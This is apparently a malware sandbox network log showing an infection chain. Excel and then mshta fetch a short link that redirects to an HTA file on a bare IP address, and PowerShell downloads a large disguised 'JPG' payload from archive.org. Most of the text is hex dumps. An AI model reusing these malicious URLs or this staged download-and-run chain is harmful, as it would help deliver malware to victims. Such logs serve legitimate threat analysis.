                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                                                                                                                                              Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                                                                                                                                              Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                                                                                                                                              Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                                                                                                                                              Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                                                                                                                                              Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                                                                                                                                              2024-10-08 13:37:28 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                                                                                                                                              Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              3192.168.2.2249167188.114.96.34433564C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:30 UTC321OUTGET /DeSHzc HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: wrath.me
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:31 UTC1156INHTTP/1.1 302 Found
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:30 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                              Content-Length: 74
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                              cross-origin-resource-policy: same-origin
                                                                                                                                                                                              x-dns-prefetch-control: off
                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                              x-download-options: noopen
                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                                                                                              referrer-policy: no-referrer
                                                                                                                                                                                              x-xss-protection: 0
                                                                                                                                                                                              location: http://38.240.44.9/590/un/verynicepersonupdation.hta
                                                                                                                                                                                              vary: Accept, Accept-Encoding
                                                                                                                                                                                              x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                                              x-do-orig-status: 302
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fmqoTCyOPsIkU2FNtGi0lbvmD179kajfNuVf2eUxwXNuQD2gvcjbr1Lk2VSElHeFQjsJBbPZWuDrOfpvqWSa721N6LHy5x%2BXooc9oWZ6ww1vqA36CsChFHSl9Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8cf686a6887c8c54-EWR
                                                                                                                                                                                              2024-10-08 13:37:31 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 33 38 2e 32 34 30 2e 34 34 2e 39 2f 35 39 30 2f 75 6e 2f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 75 70 64 61 74 69 6f 6e 2e 68 74 61
                                                                                                                                                                                              Data Ascii: Found. Redirecting to http://38.240.44.9/590/un/verynicepersonupdation.hta


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              4192.168.2.2249169188.114.97.34432104C:\Windows\System32\mshta.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:32 UTC345OUTGET /DeSHzc HTTP/1.1
                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                              Accept-Language: fr-FR
                                                                                                                                                                                              UA-CPU: AMD64
                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                              Host: wrath.me
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:32 UTC1156INHTTP/1.1 302 Found
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:32 GMT
                                                                                                                                                                                              Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                              Content-Length: 74
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              cross-origin-embedder-policy: require-corp
                                                                                                                                                                                              cross-origin-opener-policy: same-origin
                                                                                                                                                                                              cross-origin-resource-policy: same-origin
                                                                                                                                                                                              x-dns-prefetch-control: off
                                                                                                                                                                                              x-frame-options: SAMEORIGIN
                                                                                                                                                                                              strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                              x-download-options: noopen
                                                                                                                                                                                              x-content-type-options: nosniff
                                                                                                                                                                                              origin-agent-cluster: ?1
                                                                                                                                                                                              x-permitted-cross-domain-policies: none
                                                                                                                                                                                              referrer-policy: no-referrer
                                                                                                                                                                                              x-xss-protection: 0
                                                                                                                                                                                              location: http://38.240.44.9/590/un/verynicepersonupdation.hta
                                                                                                                                                                                              vary: Accept, Accept-Encoding
                                                                                                                                                                                              x-do-app-origin: 3c056774-18e7-416f-a7dd-69134c01d081
                                                                                                                                                                                              Cache-Control: private
                                                                                                                                                                                              x-do-orig-status: 302
                                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WcOlygLe4VTQtE3YONpHLOS46E%2FYCt7OJ6JiVjNUyu90w9AnRwkdMPdPYmvcWBhnAGESgOCcnvTbDtqPU6Xll8ssYOz2idNsKzz2qQ5T91zGKrhFr855XsdFuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                              CF-RAY: 8cf686b10aba421b-EWR
                                                                                                                                                                                              2024-10-08 13:37:32 UTC74INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 33 38 2e 32 34 30 2e 34 34 2e 39 2f 35 39 30 2f 75 6e 2f 76 65 72 79 6e 69 63 65 70 65 72 73 6f 6e 75 70 64 61 74 69 6f 6e 2e 68 74 61
                                                                                                                                                                                              Data Ascii: Found. Redirecting to http://38.240.44.9/590/un/verynicepersonupdation.hta


                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                              5192.168.2.2249176207.241.227.2424434040C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                              2024-10-08 13:37:44 UTC117OUTGET /32/items/detah-note-v_202410/DetahNote_V.jpg HTTP/1.1
                                                                                                                                                                                              Host: ia600102.us.archive.org
                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                              2024-10-08 13:37:45 UTC591INHTTP/1.1 200 OK
                                                                                                                                                                                              Server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:45 GMT
                                                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                                                              Content-Length: 6331693
                                                                                                                                                                                              Last-Modified: Tue, 08 Oct 2024 03:49:30 GMT
                                                                                                                                                                                              Connection: close
                                                                                                                                                                                              ETag: "6704abca-609d2d"
                                                                                                                                                                                              Strict-Transport-Security: max-age=15724800
                                                                                                                                                                                              Expires: Tue, 08 Oct 2024 19:37:45 GMT
                                                                                                                                                                                              Cache-Control: max-age=21600
                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                              Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                                                              Access-Control-Allow-Credentials: true
                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                              2024-10-08 13:37:45 UTC15793INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                              Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 5e 00 ef 9c 24 2f 18 a5 50 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b
                                                                                                                                                                                              Data Ascii: ^$/PG"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: f0 9d 5e b6 53 3c 3a 0d 53 a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a
                                                                                                                                                                                              Data Ascii: ^S<:S;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 22 b8 21 76 ed 24 f5 26 ef 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca
                                                                                                                                                                                              Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                                                                                                                                              Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                                                                                                                                              Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                                                                                                                                              Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                                                                                                                                              2024-10-08 13:37:45 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                                                                                                                                              Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
